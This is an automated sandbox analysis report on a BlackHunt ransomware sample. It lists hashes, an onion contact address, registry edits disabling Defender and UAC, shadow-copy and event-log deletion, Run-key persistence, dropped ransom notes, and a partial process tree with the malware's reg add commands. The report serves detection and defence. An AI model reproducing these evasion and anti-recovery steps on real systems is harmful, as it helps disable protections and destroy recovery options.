Analysis
-
max time kernel
104s -
max time network
84s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 01:20
Static task
static1
Behavioral task
behavioral1
Sample
ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe
Resource
win10v2004-20231215-en
General
-
Target
ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe
-
Size
707KB
-
MD5
716652b0eaeab3c380a7cc82a7abad75
-
SHA1
590bef67e16d94fc1f65806546c86d0dcea1573f
-
SHA256
ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20
-
SHA512
ca805756d02d869b21539a1573c65a0bd3ee4904b5e33dd6840c67dffef5b585017820a005725074af770f4c2def2512ffd8d6e08ba5f0d5b130bf24f765aeee
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1k8Xvnh:6uaTmkZJ+naie5OTamgEoKxLWv/h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2564 fsutil.exe 2108 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 940 wevtutil.exe 900 wevtutil.exe 864 wevtutil.exe 680 wevtutil.exe 1292 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2404 bcdedit.exe 3036 bcdedit.exe 2788 bcdedit.exe 2784 bcdedit.exe -
pid Process 1716 wbadmin.exe 2848 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2728 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\T: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\S: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\G: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\N: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\K: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\Z: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\X: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\R: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\H: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\L: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\J: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\V: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\Q: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\U: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\P: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\Y: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\I: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\B: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\W: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\O: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\A: ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File opened (read-only) \??\M: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe -
Drops file in Program Files directory 59 IoCs
description ioc Process File created C:\Program Files\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\es-ES\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\es-ES\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\7-Zip\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\it-IT\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\es-ES\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.hta ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_ReadMe.txt ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_Private.key ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2944 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1336 vssadmin.exe 1060 vssadmin.exe 1312 vssadmin.exe 2532 vssadmin.exe 816 vssadmin.exe 1500 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2608 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2488 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1140 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe Token: SeRestorePrivilege 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe Token: SeBackupPrivilege 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe Token: SeTakeOwnershipPrivilege 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe Token: SeAuditPrivilege 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe Token: SeSecurityPrivilege 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe Token: SeIncBasePriorityPrivilege 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe Token: SeBackupPrivilege 2816 vssvc.exe Token: SeRestorePrivilege 2816 vssvc.exe Token: SeAuditPrivilege 2816 vssvc.exe Token: SeBackupPrivilege 1988 wbengine.exe Token: SeRestorePrivilege 1988 wbengine.exe Token: SeSecurityPrivilege 1988 wbengine.exe Token: SeSecurityPrivilege 1292 wevtutil.exe Token: SeBackupPrivilege 1292 wevtutil.exe Token: SeSecurityPrivilege 940 wevtutil.exe Token: SeBackupPrivilege 940 wevtutil.exe Token: SeSecurityPrivilege 900 wevtutil.exe Token: SeSecurityPrivilege 680 wevtutil.exe Token: SeBackupPrivilege 680 wevtutil.exe Token: SeBackupPrivilege 900 wevtutil.exe Token: SeSecurityPrivilege 864 wevtutil.exe Token: SeBackupPrivilege 864 wevtutil.exe Token: SeDebugPrivilege 2608 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3068 wrote to memory of 2276 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 29 PID 3068 wrote to memory of 2276 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 29 PID 3068 wrote to memory of 2276 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 29 PID 3068 wrote to memory of 2276 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 29 PID 3068 wrote to memory of 2812 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 31 PID 3068 wrote to memory of 2812 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 31 PID 3068 wrote to memory of 2812 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 31 PID 3068 wrote to memory of 2812 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 31 PID 3068 wrote to memory of 2840 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 32 PID 3068 wrote to memory of 2840 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 32 PID 3068 wrote to memory of 2840 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 32 PID 3068 wrote to memory of 2840 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 32 PID 2276 wrote to memory of 2804 2276 cmd.exe 34 PID 2276 wrote to memory of 2804 2276 cmd.exe 34 PID 2276 wrote to memory of 2804 2276 cmd.exe 34 PID 3068 wrote to memory of 2436 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 36 PID 3068 wrote to memory of 2436 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 36 PID 3068 wrote to memory of 2436 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 36 PID 3068 wrote to memory of 2436 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 36 PID 3068 wrote to memory of 2672 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 38 PID 3068 wrote to memory of 2672 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 38 PID 3068 wrote to memory of 2672 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 38 PID 3068 wrote to memory of 2672 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 38 PID 3068 wrote to memory of 2856 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 40 PID 3068 wrote to memory of 2856 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 40 PID 3068 wrote to memory of 2856 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 40 PID 3068 wrote to memory of 2856 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 40 PID 2812 wrote to memory of 2600 2812 cmd.exe 42 PID 2812 wrote to memory of 2600 2812 cmd.exe 42 PID 2812 wrote to memory of 2600 2812 cmd.exe 42 PID 3068 wrote to memory of 2760 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 43 PID 3068 wrote to memory of 2760 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 43 PID 3068 wrote to memory of 2760 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 43 PID 3068 wrote to memory of 2760 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 43 PID 3068 wrote to memory of 2900 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 44 PID 3068 wrote to memory of 2900 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 44 PID 3068 wrote to memory of 2900 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 44 PID 3068 wrote to memory of 2900 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 44 PID 3068 wrote to memory of 2488 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 46 PID 3068 wrote to memory of 2488 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 46 PID 3068 wrote to memory of 2488 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 46 PID 3068 wrote to memory of 2488 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 46 PID 3068 wrote to memory of 1144 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 49 PID 3068 wrote to memory of 1144 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 49 PID 3068 wrote to memory of 1144 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 49 PID 3068 wrote to memory of 1144 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 49 PID 2436 wrote to memory of 2568 2436 cmd.exe 50 PID 2436 wrote to memory of 2568 2436 cmd.exe 50 PID 2436 wrote to memory of 2568 2436 cmd.exe 50 PID 3068 wrote to memory of 2576 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 51 PID 3068 wrote to memory of 2576 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 51 PID 3068 wrote to memory of 2576 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 51 PID 3068 wrote to memory of 2576 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 51 PID 3068 wrote to memory of 2584 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 52 PID 3068 wrote to memory of 2584 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 52 PID 3068 wrote to memory of 2584 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 52 PID 3068 wrote to memory of 2584 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 52 PID 2840 wrote to memory of 2640 2840 cmd.exe 54 PID 2840 wrote to memory of 2640 2840 cmd.exe 54 PID 2840 wrote to memory of 2640 2840 cmd.exe 54 PID 3068 wrote to memory of 2688 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 55 PID 3068 wrote to memory of 2688 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 55 PID 3068 wrote to memory of 2688 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 55 PID 3068 wrote to memory of 2688 3068 ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe 55 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe"C:\Users\Admin\AppData\Local\Temp\ece684d087602de76cd37ee76bb65a30544e4e13cc43be2475593ea92d00da20.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3068 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2436 -
